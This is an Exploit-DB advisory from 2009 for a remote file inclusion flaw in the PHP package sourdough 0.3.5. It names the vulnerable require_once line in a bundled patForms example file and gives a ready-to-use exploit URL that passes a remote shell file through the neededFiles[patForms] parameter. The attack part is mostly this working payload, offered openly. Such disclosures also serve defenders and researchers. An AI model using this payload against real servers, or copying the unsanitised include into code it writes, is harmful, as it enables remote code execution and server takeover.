sourdough 0.3.5 - Remote File Inclusion

EDB-ID:

7946




Platform:

PHP

Date:

2009-02-02


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

-----------------:Remote File Include:-----------------
-------------------------------------------------------
script:sourdough 0.3.5
   
------------------------------------------------------------------
download from:http://www.mirrorservice.org/sites/download.sourceforge.net/pub/sourceforge/s/so/sourdough/sourdough-0.3.5-alpha.zip
   
------------------------------------------------------------------

........................................................
vul: /thirdparty/patForms/examples/example_clientside_javascript.php line 32

  require_once $neededFiles['patForms'];

------------------------------------------------------
-----------------------------------------------------

xpl:

http://127.0.0.1/thirdparty/patForms/examples/example_clientside_javascript.php?neededFiles[patForms]=shell.txt?


***************************************************
***************************************************
---------------------------------------------------
Author: ahmadbady [kivi_hacker666@yahoo.com]

from[iran]
---------------------------------------------------

# milw0rm.com [2009-02-02]